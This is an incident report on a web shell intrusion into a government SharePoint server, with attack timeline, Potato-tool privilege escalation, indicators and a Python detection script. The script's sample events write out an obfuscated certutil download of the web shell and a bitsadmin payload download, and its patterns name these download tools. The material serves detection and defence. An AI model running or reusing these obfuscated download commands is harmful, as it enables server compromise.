Kaspersky SOC analysts discuss a recent incident where the well-known Behinder web shell was used as a post-exploitation backdoor, showing how web shells have evolved.
Analysis Summary
# Incident Report: Web Shell Deployment and Privilege Escalation via Potato Tools in Government Infrastructure
## Executive Summary
A security incident was detected early Monday morning on a SharePoint server belonging to a government infrastructure entity in Southeast Asia, triggered by a SIEM alert for a heuristic web shell detection. The attackers used a `certutil` command obfuscated with cmd.exe escape characters to download the initial payload, a web shell disguised as a 404 error page, from the abused file-hosting service Bashupload. They then escalated privileges with variants of the Potato exploitation family (GodPotato, BadPotato, SweetPotato), gained SYSTEM-level access and began domain trust enumeration.
## Incident Details
- Discovery Date: Early Monday morning (approx. 4 AM UTC)
- Incident Date: Malicious activity began before the 4 AM UTC alert on the day of discovery.
- Affected Organization: Government Infrastructure (Southeast Asia)
- Sector: Government Infrastructure
- Geography: Southeast Asia
## Timeline of Events
### Initial Access
- Date/Time: Prior to 4 AM UTC (the alert was raised at approximately 4 AM UTC).
- Vector: Exploitation of a vulnerable web server. The exact entry point was not confirmed; it is consistent with either a pre-existing web shell or a command injection vulnerability.
- Details: An attempt was observed to deploy a new web shell disguised as an `App_Web_404.aspx` file. The download was performed with a `certutil` command obfuscated by cmd.exe escape characters, equivalent to `certutil -urlcache -split -f hxxps://bashupload[.]com/[REDACTED]/404.aspx`, fetching the payload from the abused file-hosting service.
### Lateral Movement
- Details: After gaining SYSTEM privileges, the attackers began domain trust enumeration, mapping the relationships between domains to identify further targets. (No lateral movement techniques beyond this domain mapping were detailed.)
### Data Exfiltration/Impact
- Impact: The attackers achieved **SYSTEM privileges** on the SharePoint server. Their ultimate objective was not determined in the reported analysis, and no data exfiltration was described.
### Detection & Response
- Detection: Alert generated by Kaspersky Endpoint Security’s heuristic engine flagging `HEUR:Backdoor.MSIL.WebShell.gen` on the SharePoint server's worker process (`w3wp.exe`).
- Response Actions: The night shift team began preliminary threat analysis immediately. Because the client retained sole authority to isolate sensitive assets, the SOC could not block the attack on its own; the response therefore started with observation and analysis.
## Attack Methodology
- Initial Access: Exploitation leading to download of ASPX web shell using obfuscated `certutil`.
- Persistence: (Implied via the established web shell, though specific persistence mechanisms beyond the initial stage were not detailed).
- Privilege Escalation: Successful use of GodPotato, alongside detection of BadPotato and SweetPotato variants, to move from service account context to **System privileges**.
- Defense Evasion: Attackers inserted cmd.exe escape characters (`^` carets and empty `""` quote pairs) into the `certutil` command so that the command line no longer matched simple string-based detection rules, while cmd.exe still executed it unchanged.
- Credential Access: (Not explicitly detailed for credential theft, but system-level access often precedes this.)
- Discovery: Manual, hands-on-keyboard command execution was observed, including `whoami`, `net user` and `query user`, along with typo-ridden commands such as "localgorup" (an intended `net localgroup administrators`).
- Lateral Movement: Domain trust enumeration performed after privilege escalation.
- Collection: (Specific data collection methods not explicitly mentioned beyond the initial reconnaissance.)
- Exfiltration: (No details provided on successful data exfiltration.)
- Impact: Compromise of the SharePoint server leading to System-level access.
## Impact Assessment
- Financial: Not disclosed.
- Data Breach: Potential exposure of internal information due to reconnaissance. The specific type or volume of data is not quantified.
- Operational: Possible disruption due to compromise of a government infrastructure SharePoint server, though the investigation focused on response rather than mandatory operational shutdown.
- Reputational: Minimal public impact disclosed at the time of the analysis snippet.
## Indicators of Compromise
- Network indicators: `hxxps://bashupload[.]com/[REDACTED]/404.aspx` (Defanged URI)
- File indicators: GodPotato binary located at `C:\ProgramData\DRM\god.exe` and `C:\Users\Default\Videos\god.exe`.
- Behavioral indicators: Use of heavily obfuscated `certutil` syntax to download payloads; execution of Potato-family tools, in memory or as dropped binaries, from the IIS worker process (`w3wp.exe`).
## Response Actions
- Containment: Delayed due to client policy; response initially focused on observation and preliminary analysis. (Specific containment steps post-analysis are not detailed in the provided text.)
- Eradication: (Not detailed.)
- Recovery: (Not detailed.)
## Lessons Learned
- Web shells remain a critical post-exploitation tool, even evolving to include in-memory execution capabilities.
- Attackers continue to leverage well-known, documented frameworks (like the Potato family) due to their modularity and success against privileged services.
- Abuse of legitimate file hosting/upload services (like Bashupload) is a reliable technique for initial payload delivery.
- Client policies that reserve host-isolation decisions for the customer can delay containment and force analysts into an observation phase while approval is sought.
## Recommendations
- Implement strict egress filtering for servers such as SharePoint and IIS hosts, and alert on or block command-line download utilities (`certutil`, `bitsadmin`, etc.) fetching content from external hosts.
- Enhance detection rules to specifically target the command structure used for obfuscating Windows utilities (`certutil` keywords broken by escape characters).
- Agree in advance, in the incident response playbook, which assets the SOC may isolate on its own authority and how quickly the client must decide on the rest, so that time-sensitive containment is not blocked by approval steps.
- Deploy robust EDR/Heuristic capabilities capable of detecting in-memory execution associated with known privilege escalation frameworks.
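The defense-evasion point above (carets and empty `""` pairs scattered through the `certutil` command line) and the recommendation to detect the underlying command rather than a literal string can be handled by normalising the command line before matching. The following is an added example in Python, not code from the Kaspersky report or from the incident: it strips the two cmd.exe escape tricks, matches the download forms of `certutil` and `bitsadmin`, and checks whether the process ancestry leads back to the IIS worker `w3wp.exe`. The event schema (`image`, `cmdline`, `ancestors`) and the sample events are constructed for illustration and are not real logs from the incident.

```python
"""Detect LOLBin downloads hidden behind cmd.exe escape characters.

Added example for this report, not code from Kaspersky or the incident. The
event schema (image, cmdline, ancestors) and the sample events below are
constructed for illustration.
"""
import re
from typing import Optional

# cmd.exe drops a caret and keeps the character after it, and an empty "" pair
# is consumed by its quote parser, so both can be scattered through a command
# name without changing what executes. (Simplification: carets inside a real
# quoted string are literal in cmd.exe; this pre-processor strips them anyway.)
_EMPTY_QUOTES = re.compile(r'""')
_CARET = re.compile(r"\^(.)", re.DOTALL)


def normalize_cmdline(cmdline: str) -> str:
    """Return a lower-cased, whitespace-collapsed command line with escapes removed."""
    s = _EMPTY_QUOTES.sub("", cmdline)
    s = _CARET.sub(r"\1", s)
    return " ".join(s.split()).lower()


# Download primitives of the Windows utilities the report mentions.
DOWNLOAD_PATTERNS = {
    "certutil": re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*https?://"),
    "bitsadmin": re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?://"),
}

WEB_WORKERS = {"w3wp.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[dict]:
    """Return a finding if the event is a download via a LOLBin, else None."""
    raw = event["cmdline"]
    norm = normalize_cmdline(raw)
    for tool, pattern in DOWNLOAD_PATTERNS.items():
        if pattern.search(norm):
            ancestors = {_basename(p) for p in event.get("ancestors", [])}
            return {
                "tool": tool,
                "normalized": norm,
                # Any difference after normalisation means escape characters were present.
                "obfuscated": norm != " ".join(raw.split()).lower(),
                "from_web_worker": bool(ancestors & WEB_WORKERS),
            }
    return None


def scan(events) -> list:
    """Run classify() over a sequence of events and keep the findings."""
    return [hit for hit in (classify(e) for e in events) if hit is not None]


# Constructed sample process-creation events (not real logs from the incident).
SAMPLE_EVENTS = [
    {   # obfuscated certutil download spawned through cmd.exe under IIS
        "image": r"C:\Windows\System32\certutil.exe",
        "cmdline": r'c^e^r^t""u^til -url^cache -split -f https://bashupload.com/REDACTED/404.aspx App_Web_404.aspx',
        "ancestors": [r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\inetsrv\w3wp.exe"],
    },
    {   # benign administrative use of certutil from an interactive shell
        "image": r"C:\Windows\System32\certutil.exe",
        "cmdline": r"certutil -hashfile C:\Temp\installer.msi SHA256",
        "ancestors": [r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe"],
    },
    {   # unobfuscated bitsadmin download launched by a service host
        "image": r"C:\Windows\System32\bitsadmin.exe",
        "cmdline": r"bitsadmin /transfer job /download /priority normal https://example.invalid/tool.exe C:\Users\Public\tool.exe",
        "ancestors": [r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe"],
    },
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Both the obfuscated `certutil` event and the plain `bitsadmin` event are flagged; the `obfuscated` and `from_web_worker` fields separate the IIS-spawned, escape-laden command (the pattern seen in this incident) from routine administrative downloads, so the two can be routed to different alert severities. Other cmd.exe tricks, such as environment-variable substring expansion, are not normalised here and would need their own handling.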